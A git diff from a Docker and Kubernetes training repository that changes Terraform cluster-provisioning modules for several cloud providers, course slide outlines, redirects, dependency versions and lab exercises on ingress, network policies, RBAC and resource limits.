|
||||
max_nodes = var.max_nodes_per_pool
|
||||
}
|
||||
|
||||
locals {
|
||||
k8s_version = "1.26"
|
||||
}
|
||||
@@ -1,12 +0,0 @@
|
||||
output "cluster_id" {
|
||||
value = ovh_cloud_project_kube._.id
|
||||
}
|
||||
|
||||
output "has_metrics_server" {
|
||||
value = false
|
||||
}
|
||||
|
||||
output "kubeconfig" {
|
||||
sensitive = true
|
||||
value = ovh_cloud_project_kube._.kubeconfig
|
||||
}
|
||||
@@ -1,7 +0,0 @@
|
||||
terraform {
|
||||
required_providers {
|
||||
ovh = {
|
||||
source = "ovh/ovh"
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1 +0,0 @@
|
||||
../../providers/ovh/variables.tf
|
||||
@@ -1,23 +1,10 @@
|
||||
resource "scaleway_vpc_private_network" "_" {
|
||||
}
|
||||
|
||||
# This is a kind of hack to use a custom security group with Kapsulse.
|
||||
# See https://www.scaleway.com/en/docs/containers/kubernetes/reference-content/secure-cluster-with-private-network/
|
||||
|
||||
resource "scaleway_instance_security_group" "_" {
|
||||
name = "kubernetes ${split("/", scaleway_k8s_cluster._.id)[1]}"
|
||||
inbound_default_policy = "accept"
|
||||
outbound_default_policy = "accept"
|
||||
}
|
||||
|
||||
resource "scaleway_k8s_cluster" "_" {
|
||||
name = var.cluster_name
|
||||
name = var.cluster_name
|
||||
#region = var.location
|
||||
tags = var.common_tags
|
||||
version = local.k8s_version
|
||||
type = "kapsule"
|
||||
cni = "cilium"
|
||||
delete_additional_resources = true
|
||||
private_network_id = scaleway_vpc_private_network._.id
|
||||
}
|
||||
|
||||
resource "scaleway_k8s_pool" "_" {
|
||||
@@ -30,7 +17,6 @@ resource "scaleway_k8s_pool" "_" {
|
||||
max_size = var.max_nodes_per_pool
|
||||
autoscaling = var.max_nodes_per_pool > var.min_nodes_per_pool
|
||||
autohealing = true
|
||||
depends_on = [ scaleway_instance_security_group._ ]
|
||||
}
|
||||
|
||||
data "scaleway_k8s_version" "_" {
|
||||
|
||||
@@ -4,7 +4,6 @@ resource "helm_release" "_" {
|
||||
create_namespace = true
|
||||
repository = "https://charts.loft.sh"
|
||||
chart = "vcluster"
|
||||
version = "0.19.7"
|
||||
set {
|
||||
name = "service.type"
|
||||
value = "NodePort"
|
||||
|
||||
@@ -44,5 +44,5 @@ locals {
|
||||
guest_api_server_port = local.node_port
|
||||
guest_api_server_url_new = "https://${local.guest_api_server_host}:${local.guest_api_server_port}"
|
||||
guest_api_server_url_old = yamldecode(local.kubeconfig_raw).clusters[0].cluster.server
|
||||
kubeconfig = replace(local.kubeconfig_raw, local.guest_api_server_url_old, local.guest_api_server_url_new)
|
||||
kubeconfig = replace(local.kubeconfig_raw, local.guest_api_server_url_old, local.guest_api_server_url_new)
|
||||
}
|
||||
|
||||
@@ -14,9 +14,9 @@ $ hcloud server-type list | grep shared
|
||||
variable "node_sizes" {
|
||||
type = map(any)
|
||||
default = {
|
||||
S = "cpx11"
|
||||
M = "cpx21"
|
||||
L = "cpx31"
|
||||
S = "cx11"
|
||||
M = "cx21"
|
||||
L = "cx31"
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
@@ -1,13 +0,0 @@
|
||||
variable "node_sizes" {
|
||||
type = map(any)
|
||||
default = {
|
||||
S = "d2-4"
|
||||
M = "d2-4"
|
||||
L = "d2-8"
|
||||
}
|
||||
}
|
||||
|
||||
variable "location" {
|
||||
type = string
|
||||
default = "BHS5"
|
||||
}
|
||||
@@ -1,5 +1,5 @@
|
||||
variable "node_sizes" {
|
||||
type = map(any)
|
||||
type = map(any)
|
||||
default = {}
|
||||
}
|
||||
|
||||
|
||||
@@ -71,10 +71,10 @@ resource "local_file" "ip_addresses" {
|
||||
resource "local_file" "clusters" {
|
||||
content = join("", formatlist("%s\n", [
|
||||
for cid in range(1, 1 + var.how_many_clusters) :
|
||||
join("\t",
|
||||
join(" ",
|
||||
[for nid in range(1, 1 + var.nodes_per_cluster) :
|
||||
local.ip_addresses[format("c%03dn%03d", cid, nid)]
|
||||
])]))
|
||||
filename = "clusters.tsv"
|
||||
filename = "clusters.txt"
|
||||
file_permission = "0600"
|
||||
}
|
||||
|
||||
@@ -1,22 +1,14 @@
|
||||
resource "openstack_compute_instance_v2" "_" {
|
||||
for_each = local.nodes
|
||||
name = each.value.node_name
|
||||
image_name = data.openstack_images_image_v2._.name
|
||||
image_name = var.image
|
||||
flavor_name = each.value.node_size
|
||||
key_pair = openstack_compute_keypair_v2._.name
|
||||
key_pair = openstack_compute_keypair_v2._.name
|
||||
network {
|
||||
port = openstack_networking_port_v2._[each.key].id
|
||||
}
|
||||
}
|
||||
|
||||
data "openstack_images_image_v2" "_" {
|
||||
most_recent = true
|
||||
properties = {
|
||||
os = "ubuntu"
|
||||
version = "24.04"
|
||||
}
|
||||
}
|
||||
|
||||
resource "openstack_networking_port_v2" "_" {
|
||||
for_each = local.nodes
|
||||
network_id = openstack_networking_network_v2._.id
|
||||
|
||||
@@ -31,6 +31,10 @@ variable "external_network_id" {
|
||||
type = string
|
||||
}
|
||||
|
||||
variable "image" {
|
||||
type = string
|
||||
}
|
||||
|
||||
variable "node_sizes" {
|
||||
type = map(any)
|
||||
default = {}
|
||||
|
||||
@@ -4,11 +4,6 @@
|
||||
# another set of clusters while a first one is still running)
|
||||
# you should set the TF_VAR_cluster_name environment variable.
|
||||
|
||||
if ! [ "$TF_VAR_cluster_name" ]; then
|
||||
echo "Please set TF_VAR_cluster_name. Thanks."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
cd terraform/one-kubernetes
|
||||
|
||||
case "$1" in
|
||||
|
||||
File diff suppressed because one or more lines are too long
|
Before Width: | Height: | Size: 81 KiB |
Binary file not shown.
|
Before Width: | Height: | Size: 31 KiB |
1
prepare-labs/www/qrcode.min.js
vendored
1
prepare-labs/www/qrcode.min.js
vendored
File diff suppressed because one or more lines are too long
68
slides/1.yml
Normal file
68
slides/1.yml
Normal file
@@ -0,0 +1,68 @@
|
||||
title: |
|
||||
Docker Intensif
|
||||
|
||||
chat: "[Mattermost](https://highfive.container.training/mattermost)"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: https://2023-05-enix.container.training/
|
||||
|
||||
#slidenumberprefix: "#SomeHashTag — "
|
||||
|
||||
exclude:
|
||||
- self-paced
|
||||
|
||||
content:
|
||||
- shared/title.md
|
||||
- logistics.md
|
||||
- containers/intro.md
|
||||
- shared/about-slides.md
|
||||
- shared/chat-room-im.md
|
||||
#- shared/chat-room-zoom-meeting.md
|
||||
#- shared/chat-room-zoom-webinar.md
|
||||
- shared/toc.md
|
||||
- # DAY 1
|
||||
#- containers/Docker_Overview.md
|
||||
#- containers/Docker_History.md
|
||||
- containers/Training_Environment.md
|
||||
#- containers/Installing_Docker.md
|
||||
- containers/First_Containers.md
|
||||
- containers/Background_Containers.md
|
||||
- containers/Initial_Images.md
|
||||
- containers/Building_Images_Interactively.md
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- # DAY 2
|
||||
- containers/Container_Networking_Basics.md
|
||||
- containers/Local_Development_Workflow.md
|
||||
- containers/Container_Network_Model.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
- # DAY 3
|
||||
- containers/Start_And_Attach.md
|
||||
- containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Advanced_Dockerfiles.md
|
||||
- containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- # DAY 4
|
||||
- containers/Buildkit.md
|
||||
- containers/Network_Drivers.md
|
||||
- containers/Namespaces_Cgroups.md
|
||||
#- containers/Copy_On_Write.md
|
||||
- containers/Orchestration_Overview.md
|
||||
#- containers/Docker_Machine.md
|
||||
#- containers/Init_Systems.md
|
||||
#- containers/Application_Configuration.md
|
||||
#- containers/Logging.md
|
||||
#- containers/Containers_From_Scratch.md
|
||||
#- containers/Container_Engines.md
|
||||
#- containers/Pods_Anatomy.md
|
||||
#- containers/Ecosystem.md
|
||||
- shared/thankyou.md
|
||||
#- containers/links.md
|
||||
@@ -1,11 +1,11 @@
|
||||
title: |
|
||||
Kubernetes
|
||||
Fondamentaux Kubernetes
|
||||
|
||||
chat: "[Mattermost](https://training.enix.io/mattermost)"
|
||||
chat: "[Mattermost](https://highfive.container.training/mattermost)"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: https://2024-10-boursorama.container.training/
|
||||
slides: https://2023-05-enix.container.training/
|
||||
|
||||
#slidenumberprefix: "#SomeHashTag — "
|
||||
|
||||
@@ -24,75 +24,69 @@ content:
|
||||
- shared/handson.md
|
||||
#- shared/webssh.md
|
||||
- shared/connecting.md
|
||||
- exercises/k8sfundamentals-brief.md
|
||||
- exercises/yaml-brief.md
|
||||
- exercises/localcluster-brief.md
|
||||
- exercises/healthchecks-brief.md
|
||||
- shared/toc.md
|
||||
- # 1 Monday morning
|
||||
- # 1
|
||||
#- k8s/versions-k8s.md
|
||||
- shared/sampleapp.md
|
||||
#- shared/composescale.md
|
||||
#- shared/hastyconclusions.md
|
||||
- shared/composedown.md
|
||||
- k8s/concepts-k8s.md
|
||||
- k8s/kubectlget.md
|
||||
- k8s/kubectl-run.md
|
||||
- k8s/kubectlexpose.md
|
||||
#- k8s/shippingimages.md
|
||||
- k8s/service-types.md
|
||||
- k8s/kubenet.md
|
||||
- k8s/shippingimages.md
|
||||
#- k8s/buildshiprun-selfhosted.md
|
||||
- k8s/buildshiprun-dockerhub.md
|
||||
- exercises/k8sfundamentals-details.md
|
||||
- k8s/ourapponkube.md
|
||||
- # 2 Monday afternoon
|
||||
- k8s/service-types.md
|
||||
- k8s/kubenet.md
|
||||
#- k8s/exercise-wordsmith.md
|
||||
- # 2
|
||||
- shared/yaml.md
|
||||
- k8s/labels-annotations.md
|
||||
- k8s/kubectl-logs.md
|
||||
- k8s/logs-cli.md
|
||||
- # 3 Tuesday morning
|
||||
- shared/yaml.md
|
||||
- k8s/yamldeploy.md
|
||||
- k8s/namespaces.md
|
||||
- shared/declarative.md
|
||||
- k8s/declarative.md
|
||||
- k8s/deploymentslideshow.md
|
||||
- k8s/ingress.md
|
||||
- k8s/cert-manager.md
|
||||
- k8s/setup-overview.md
|
||||
- k8s/setup-devel.md
|
||||
#- k8s/setup-managed.md
|
||||
#- k8s/setup-selfhosted.md
|
||||
- k8s/localkubeconfig.md
|
||||
- k8s/accessinternal.md
|
||||
- k8s/kubectlproxy.md
|
||||
- exercises/yaml-details.md
|
||||
- exercises/ingress-details.md
|
||||
- # 4 Tuesday afternoon
|
||||
- k8s/volumes.md
|
||||
#- k8s/exercise-configmap.md
|
||||
- k8s/configuration.md
|
||||
- k8s/secrets.md
|
||||
- # 5 Wednesday morning
|
||||
- exercises/localcluster-details.md
|
||||
- # 3
|
||||
#- k8s/kubectlscale.md
|
||||
- k8s/scalingdockercoins.md
|
||||
- shared/hastyconclusions.md
|
||||
- k8s/daemonset.md
|
||||
- k8s/rollout.md
|
||||
- k8s/healthchecks.md
|
||||
#- k8s/healthchecks-more.md
|
||||
- k8s/dashboard.md
|
||||
- k8s/k9s.md
|
||||
- k8s/tilt.md
|
||||
- exercises/healthchecks-details.md
|
||||
- # 6 Wednesday afternoon
|
||||
- k8s/resource-limits.md
|
||||
- k8s/metrics-server.md
|
||||
- k8s/cluster-sizing.md
|
||||
#- k8s/horizontal-pod-autoscaler.md
|
||||
- exercises/reqlim-details.md
|
||||
- # 7 Thursday morning
|
||||
- k8s/authn-authz.md
|
||||
- k8s/admission.md
|
||||
- k8s/cainjector.md
|
||||
- k8s/kyverno.md
|
||||
- exercises/rbac-details.md
|
||||
- exercises/kyverno-ingress-domain-name-details.md
|
||||
- # 8 Thursday afternoon
|
||||
- k8s/statefulsets.md
|
||||
- k8s/consul.md
|
||||
- k8s/pv-pvc-sc.md
|
||||
- k8s/volume-claim-templates.md
|
||||
- k8s/stateful-failover.md
|
||||
- # 9 Friday morning
|
||||
- k8s/helm-intro.md
|
||||
- k8s/helm-chart-format.md
|
||||
- k8s/helm-create-basic-chart.md
|
||||
- exercises/helm-generic-chart-details.md
|
||||
- # 10 Friday afternoon
|
||||
- k8s/helm-create-better-chart.md
|
||||
- k8s/helm-dependencies.md
|
||||
- k8s/helm-values-schema-validation.md
|
||||
- k8s/helm-secrets.md
|
||||
- exercises/helm-umbrella-chart-details.md
|
||||
- # 4
|
||||
- k8s/ingress.md
|
||||
#- k8s/ingress-tls.md
|
||||
#- k8s/ingress-advanced.md
|
||||
- k8s/volumes.md
|
||||
#- k8s/exercise-configmap.md
|
||||
#- k8s/build-with-docker.md
|
||||
#- k8s/build-with-kaniko.md
|
||||
- k8s/configuration.md
|
||||
- k8s/secrets.md
|
||||
- k8s/batch-jobs.md
|
||||
- shared/thankyou.md
|
||||
43
slides/3.yml
Normal file
43
slides/3.yml
Normal file
@@ -0,0 +1,43 @@
|
||||
title: |
|
||||
Packaging d'applications
|
||||
pour Kubernetes
|
||||
|
||||
chat: "[Mattermost](https://highfive.container.training/mattermost)"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: https://2023-05-enix.container.training/
|
||||
|
||||
#slidenumberprefix: "#SomeHashTag — "
|
||||
|
||||
exclude:
|
||||
- self-paced
|
||||
|
||||
content:
|
||||
- shared/title.md
|
||||
- logistics-julien.md
|
||||
- k8s/intro.md
|
||||
- shared/about-slides.md
|
||||
- k8s/prereqs-advanced.md
|
||||
- shared/handson.md
|
||||
- shared/webssh.md
|
||||
- shared/connecting.md
|
||||
#- shared/chat-room-im.md
|
||||
#- shared/chat-room-zoom.md
|
||||
- shared/toc.md
|
||||
-
|
||||
- k8s/demo-apps.md
|
||||
- k8s/kustomize.md
|
||||
- k8s/helm-intro.md
|
||||
- k8s/helm-chart-format.md
|
||||
- k8s/helm-create-basic-chart.md
|
||||
- exercises/helm-generic-chart-details.md
|
||||
-
|
||||
- k8s/helm-create-better-chart.md
|
||||
- k8s/helm-dependencies.md
|
||||
- k8s/helm-values-schema-validation.md
|
||||
- k8s/helm-secrets.md
|
||||
- exercises/helm-umbrella-chart-details.md
|
||||
-
|
||||
- k8s/ytt.md
|
||||
- shared/thankyou.md
|
||||
70
slides/4.yml
Normal file
70
slides/4.yml
Normal file
@@ -0,0 +1,70 @@
|
||||
title: |
|
||||
Kubernetes Avancé
|
||||
|
||||
chat: "[Mattermost](https://highfive.container.training/mattermost)"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: https://2023-05-enix.container.training/
|
||||
|
||||
#slidenumberprefix: "#SomeHashTag — "
|
||||
|
||||
exclude:
|
||||
- self-paced
|
||||
|
||||
content:
|
||||
- shared/title.md
|
||||
- logistics.md
|
||||
- k8s/intro.md
|
||||
- shared/about-slides.md
|
||||
- shared/chat-room-im.md
|
||||
#- shared/chat-room-zoom.md
|
||||
- k8s/prereqs-advanced.md
|
||||
- shared/handson.md
|
||||
- shared/webssh.md
|
||||
- shared/connecting.md
|
||||
- shared/toc.md
|
||||
- exercises/netpol-brief.md
|
||||
- exercises/sealed-secrets-brief.md
|
||||
- exercises/kyverno-ingress-domain-name-brief.md
|
||||
- #1
|
||||
- k8s/demo-apps.md
|
||||
- k8s/netpol.md
|
||||
- k8s/authn-authz.md
|
||||
- k8s/sealed-secrets.md
|
||||
- k8s/cert-manager.md
|
||||
- k8s/cainjector.md
|
||||
- k8s/ingress-tls.md
|
||||
- exercises/netpol-details.md
|
||||
- exercises/sealed-secrets-details.md
|
||||
- #2
|
||||
- k8s/extending-api.md
|
||||
- k8s/crd.md
|
||||
- k8s/operators.md
|
||||
- k8s/admission.md
|
||||
- k8s/cainjector.md
|
||||
- k8s/kyverno.md
|
||||
- exercises/kyverno-ingress-domain-name-details.md
|
||||
- #3
|
||||
- k8s/resource-limits.md
|
||||
- k8s/metrics-server.md
|
||||
- k8s/cluster-sizing.md
|
||||
- k8s/horizontal-pod-autoscaler.md
|
||||
- k8s/apiserver-deepdive.md
|
||||
- k8s/aggregation-layer.md
|
||||
- k8s/hpa-v2.md
|
||||
- #4
|
||||
- k8s/statefulsets.md
|
||||
- k8s/consul.md
|
||||
- k8s/pv-pvc-sc.md
|
||||
- k8s/volume-claim-templates.md
|
||||
#- k8s/eck.md
|
||||
#- k8s/portworx.md
|
||||
- k8s/openebs.md
|
||||
- k8s/stateful-failover.md
|
||||
- k8s/operators-design.md
|
||||
- k8s/operators-example.md
|
||||
- k8s/owners-and-dependents.md
|
||||
- k8s/events.md
|
||||
- k8s/finalizers.md
|
||||
- shared/thankyou.md
|
||||
59
slides/5.yml
Normal file
59
slides/5.yml
Normal file
@@ -0,0 +1,59 @@
|
||||
title: |
|
||||
Opérer Kubernetes
|
||||
|
||||
chat: "[Mattermost](https://highfive.container.training/mattermost)"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: https://2023-05-enix.container.training/
|
||||
|
||||
#slidenumberprefix: "#SomeHashTag — "
|
||||
|
||||
exclude:
|
||||
- self-paced
|
||||
|
||||
content:
|
||||
- shared/title.md
|
||||
- logistics-ludovic.md
|
||||
- k8s/intro.md
|
||||
- shared/about-slides.md
|
||||
- shared/chat-room-im.md
|
||||
#- shared/chat-room-zoom-meeting.md
|
||||
#- shared/chat-room-zoom-webinar.md
|
||||
- shared/toc.md
|
||||
# DAY 1
|
||||
-
|
||||
- k8s/prereqs-advanced.md
|
||||
- shared/handson.md
|
||||
- k8s/architecture.md
|
||||
- k8s/deploymentslideshow.md
|
||||
- k8s/dmuc.md
|
||||
-
|
||||
- k8s/multinode.md
|
||||
- k8s/cni.md
|
||||
- k8s/interco.md
|
||||
-
|
||||
- k8s/cni-internals.md
|
||||
- k8s/apilb.md
|
||||
- k8s/internal-apis.md
|
||||
- k8s/staticpods.md
|
||||
- k8s/cluster-upgrade.md
|
||||
- k8s/cluster-backup.md
|
||||
#- k8s/cloud-controller-manager.md
|
||||
-
|
||||
- k8s/control-plane-auth.md
|
||||
- k8s/user-cert.md
|
||||
- k8s/csr-api.md
|
||||
- k8s/openid-connect.md
|
||||
- k8s/pod-security-intro.md
|
||||
- k8s/pod-security-policies.md
|
||||
- k8s/pod-security-admission.md
|
||||
- shared/thankyou.md
|
||||
#-
|
||||
# |
|
||||
# # (Extra content)
|
||||
# - k8s/apiserver-deepdive.md
|
||||
# - k8s/setup-overview.md
|
||||
# - k8s/setup-devel.md
|
||||
# - k8s/setup-managed.md
|
||||
# - k8s/setup-selfhosted.md
|
||||
@@ -2,7 +2,6 @@
|
||||
#/ /kube-halfday.yml.html 200!
|
||||
#/ /kube-fullday.yml.html 200!
|
||||
#/ /kube-twodays.yml.html 200!
|
||||
/ /kube.yml.html 200!
|
||||
|
||||
# And this allows to do "git clone https://container.training".
|
||||
/info/refs service=git-upload-pack https://github.com/jpetazzo/container.training/info/refs?service=git-upload-pack
|
||||
@@ -17,10 +16,12 @@
|
||||
|
||||
# Shortlinks for next training in English and French
|
||||
#/next https://www.eventbrite.com/e/livestream-intensive-kubernetes-bootcamp-tickets-103262336428
|
||||
/next https://qconsf.com/training/nov2024/asynchronous-architecture-patterns-scale-ml-and-other-high-latency-workloads
|
||||
/next https://skillsmatter.com/courses/700-advanced-kubernetes-concepts-workshop-jerome-petazzoni
|
||||
/hi5 https://enix.io/fr/services/formation/online/
|
||||
/us https://www.ardanlabs.com/live-training-events/deploying-microservices-and-traditional-applications-with-kubernetes-march-28-2022.html
|
||||
/uk https://skillsmatter.com/workshops/827-deploying-microservices-and-traditional-applications-with-kubernetes-with-jerome-petazzoni
|
||||
|
||||
# Survey form
|
||||
/please https://docs.google.com/forms/d/e/1FAIpQLSfIYSgrV7tpfBNm1hOaprjnBHgWKn5n-k5vtNXYJkOX1sRxng/viewform
|
||||
|
||||
/ /highfive.html 200!
|
||||
|
||||
818
slides/autopilot/package-lock.json
generated
818
slides/autopilot/package-lock.json
generated
File diff suppressed because it is too large
Load Diff
@@ -2,8 +2,8 @@
|
||||
"name": "container-training-pub-sub-server",
|
||||
"version": "0.0.1",
|
||||
"dependencies": {
|
||||
"express": "^4.21.1",
|
||||
"socket.io": "^4.8.0",
|
||||
"socket.io-client": "^4.7.5"
|
||||
"express": "^4.16.2",
|
||||
"socket.io": "^4.6.1",
|
||||
"socket.io-client": "^4.5.1"
|
||||
}
|
||||
}
|
||||
|
||||
@@ -40,7 +40,7 @@
|
||||
|
||||
- In multi-stage builds, all stages can be built in parallel
|
||||
|
||||
(example: https://github.com/jpetazzo/shpod; [before][shpod-before-parallel] and [after][shpod-after-parallel])
|
||||
(example: https://github.com/jpetazzo/shpod; [before] and [after])
|
||||
|
||||
- Stages are built only when they are necessary
|
||||
|
||||
@@ -50,8 +50,8 @@
|
||||
|
||||
- Files are cached in the builder
|
||||
|
||||
[shpod-before-parallel]: https://github.com/jpetazzo/shpod/blob/c6efedad6d6c3dc3120dbc0ae0a6915f85862474/Dockerfile
|
||||
[shpod-after-parallel]: https://github.com/jpetazzo/shpod/blob/d20887bbd56b5fcae2d5d9b0ce06cae8887caabf/Dockerfile
|
||||
[before]: https://github.com/jpetazzo/shpod/blob/c6efedad6d6c3dc3120dbc0ae0a6915f85862474/Dockerfile
|
||||
[after]: https://github.com/jpetazzo/shpod/blob/d20887bbd56b5fcae2d5d9b0ce06cae8887caabf/Dockerfile
|
||||
|
||||
---
|
||||
|
||||
@@ -121,10 +121,10 @@ docker buildx build … \
|
||||
|
||||
- Must not use binary downloads with hard-coded architectures!
|
||||
|
||||
(streamlining a Dockerfile for multi-arch: [before][shpod-before-multiarch], [after][shpod-after-multiarch])
|
||||
(streamlining a Dockerfile for multi-arch: [before], [after])
|
||||
|
||||
[shpod-before-multiarch]: https://github.com/jpetazzo/shpod/blob/d20887bbd56b5fcae2d5d9b0ce06cae8887caabf/Dockerfile
|
||||
[shpod-after-multiarch]: https://github.com/jpetazzo/shpod/blob/c50789e662417b34fea6f5e1d893721d66d265b7/Dockerfile
|
||||
[before]: https://github.com/jpetazzo/shpod/blob/d20887bbd56b5fcae2d5d9b0ce06cae8887caabf/Dockerfile
|
||||
[after]: https://github.com/jpetazzo/shpod/blob/c50789e662417b34fea6f5e1d893721d66d265b7/Dockerfile
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -120,11 +120,11 @@ class: extra-details
|
||||
|
||||
(and won't end up in the resulting image)
|
||||
|
||||
- See the [documentation][dockerignore] for the little details
|
||||
- See the [documentation] for the little details
|
||||
|
||||
(exceptions can be made with `!`, multiple directory levels with `**`...)
|
||||
|
||||
[dockerignore]: https://docs.docker.com/engine/reference/builder/#dockerignore-file
|
||||
[documentation]: https://docs.docker.com/engine/reference/builder/#dockerignore-file
|
||||
|
||||
???
|
||||
|
||||
|
||||
@@ -113,16 +113,22 @@ class: pic
|
||||
## Results
|
||||
|
||||
* [Dev-to-prod reduced from 9 months to 15 minutes (ING)](
|
||||
https://gallant-turing-d0d520.netlify.com/docker-case-studies/CS_ING_01.25.2015_1.pdf)
|
||||
https://www.docker.com/sites/default/files/CS_ING_01.25.2015_1.pdf)
|
||||
|
||||
* [Continuous integration job time reduced by more than 60% (BBC)](
|
||||
https://gallant-turing-d0d520.netlify.com/docker-case-studies/CS_BBCNews_01.25.2015_1.pdf)
|
||||
https://www.docker.com/sites/default/files/CS_BBCNews_01.25.2015_1.pdf)
|
||||
|
||||
* [Deploy 100 times a day instead of once a week (GILT)](
|
||||
https://gallant-turing-d0d520.netlify.com/docker-case-studies/CS_Gilt_Groupe_03.18.2015_0.pdf)
|
||||
https://www.docker.com/sites/default/files/CS_Gilt%20Groupe_03.18.2015_0.pdf)
|
||||
|
||||
* [70% infrastructure consolidation (MetLife)](
|
||||
https://www.youtube.com/watch?v=Bwt3xigvlj0)
|
||||
https://www.docker.com/customers/metlife-transforms-customer-experience-legacy-and-microservices-mashup)
|
||||
|
||||
* [60% infrastructure consolidation (Intesa Sanpaolo)](
|
||||
https://blog.docker.com/2017/11/intesa-sanpaolo-builds-resilient-foundation-banking-docker-enterprise-edition/)
|
||||
|
||||
* [14x application density; 60% of legacy datacenter migrated in 4 months (GE Appliances)](
|
||||
https://www.docker.com/customers/ge-uses-docker-enable-self-service-their-developers)
|
||||
|
||||
* etc.
|
||||
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
## Exercise — Ingress Controller
|
||||
## Exercise — Ingress
|
||||
|
||||
- Add an ingress controller to a Kubernetes cluster
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
# Exercise — Ingress Controller
|
||||
# Exercise — Ingress
|
||||
|
||||
- We want to expose a couple of web apps through an ingress controller
|
||||
|
||||
@@ -128,4 +128,4 @@ This is similar to the previous scenario, but with two significant changes:
|
||||
|
||||
1. We only want to run the ingress controller on nodes that have the role `ingress`.
|
||||
|
||||
2. We want to either use `hostPort`, or a list of `externalIPs` (not `hostNetwork`).
|
||||
2. We don't want to use `hostNetwork`, but a list of `externalIPs` instead.
|
||||
@@ -1,6 +1,6 @@
|
||||
# Exercise — Network Policies
|
||||
|
||||
We want to implement a generic network security mechanism.
|
||||
We want to to implement a generic network security mechanism.
|
||||
|
||||
Instead of creating one policy per service, we want to
|
||||
create a fixed number of policies, and use a single label
|
||||
|
||||
@@ -1,11 +0,0 @@
|
||||
## Exercise — Enable RBAC
|
||||
|
||||
- Enable RBAC on a manually-deployed control plane
|
||||
|
||||
- This involves:
|
||||
|
||||
- generating different certificates
|
||||
|
||||
- distributing the certificates to the controllers
|
||||
|
||||
- enabling the proper authorizers in API server
|
||||
@@ -1,117 +0,0 @@
|
||||
# Exercise — Enable RBAC
|
||||
|
||||
- We want to enable RBAC on the "polykube" cluster
|
||||
|
||||
(it doesn't matter whether we have 1 or multiple nodes)
|
||||
|
||||
- Ideally, we want to have, for instance:
|
||||
|
||||
- one key, certificate, and kubeconfig for a cluster admin
|
||||
|
||||
- one key, certificate, and kubeconfig for a user
|
||||
<br/>
|
||||
(with permissions in a single namespace)
|
||||
|
||||
- Bonus points: enable the NodeAuthorizer too!
|
||||
|
||||
- Check the following slides for hints
|
||||
|
||||
---
|
||||
|
||||
## Step 1
|
||||
|
||||
- Enable RBAC itself!
|
||||
|
||||
--
|
||||
|
||||
- This is done with an API server command-line flag
|
||||
|
||||
--
|
||||
|
||||
- Check [the documentation][kube-apiserver-doc] to see the flag
|
||||
|
||||
--
|
||||
|
||||
- For now, only enable `--authorization-mode=RBAC`
|
||||
|
||||
[kube-apiserver-doc]: https://kubernetes.io/docs/reference/command-line-tools-reference/kube-apiserver/
|
||||
|
||||
---
|
||||
|
||||
## Step 2
|
||||
|
||||
- Our certificate doesn't work anymore, we need to generate a new one
|
||||
|
||||
--
|
||||
|
||||
- We need a certificate that will have *some* (ideally *all*) permissions
|
||||
|
||||
--
|
||||
|
||||
- Two options:
|
||||
|
||||
- use the equivalent of "root" (identity that completely skips permission checks)
|
||||
|
||||
- a "non-root" identity but which is granted permissions with RBAC
|
||||
|
||||
--
|
||||
|
||||
- The "non-root" option looks nice, but to grant permissions, we need permissions
|
||||
|
||||
- So let's start with the equivalent of "root"!
|
||||
|
||||
--
|
||||
|
||||
- The Kubernetes equivalent of `root` is the group `system:masters`
|
||||
|
||||
---
|
||||
|
||||
## Step 2, continued
|
||||
|
||||
- We need to generate a certificate for a user belonging to group `system:masters`
|
||||
|
||||
--
|
||||
|
||||
- In Kubernetes certificates, groups are encoded with the "organization" field
|
||||
|
||||
--
|
||||
|
||||
- That corresponds to `O=system:masters`
|
||||
|
||||
--
|
||||
|
||||
- In other words we need to generate a new certificate, but with a subject of:
|
||||
|
||||
`/CN=admin/O=system:masters/` (the `CN` doesn't matter)
|
||||
|
||||
- That certificate should be able to interact with the API server, like before
|
||||
|
||||
---
|
||||
|
||||
## Step 3
|
||||
|
||||
- Now, all our controllers have permissions issues
|
||||
|
||||
- We need to either:
|
||||
|
||||
- use that `system:masters` cert everywhere
|
||||
|
||||
- generate different certs for every controller, with the proper identities
|
||||
|
||||
- Suggestion: use `system-masters` everywhere to begin with
|
||||
|
||||
(and make sure the cluster is back on its feet)
|
||||
|
||||
---
|
||||
|
||||
## Step 4
|
||||
|
||||
At this point, there are two possible forks in the road:
|
||||
|
||||
1. Generate certs for the control plane controllers
|
||||
|
||||
(`kube-controller-manager`, `kube-scheduler`)
|
||||
|
||||
2. Generate cert(s) for the node(s) and enable `NodeAuthorizer`
|
||||
|
||||
Good luck!
|
||||
@@ -1,7 +0,0 @@
|
||||
## Exercise — Requests and Limits
|
||||
|
||||
- Check current resource allocation and utilization
|
||||
|
||||
- Make sure that all workloads have requests (and perhaps limits)
|
||||
|
||||
- Make sure that all *future* workloads too!
|
||||
@@ -1,55 +0,0 @@
|
||||
# Exercise — Requests and Limits
|
||||
|
||||
By default, if we don't specify *resource requests*,
|
||||
our workloads will run in `BestEffort` quality of service.
|
||||
|
||||
`BestEffort` is very bad for production workloads,
|
||||
because the scheduler has no idea of the actual resource
|
||||
requirements of our apps, and won't be able to make
|
||||
smart decisions about workload placement.
|
||||
|
||||
As a result, when the cluster gets overloaded,
|
||||
containers will be killed, pods will be evicted,
|
||||
and service disruptions will happen.
|
||||
|
||||
Let's solve this!
|
||||
|
||||
---
|
||||
|
||||
## Check current state
|
||||
|
||||
- Check *allocations*
|
||||
|
||||
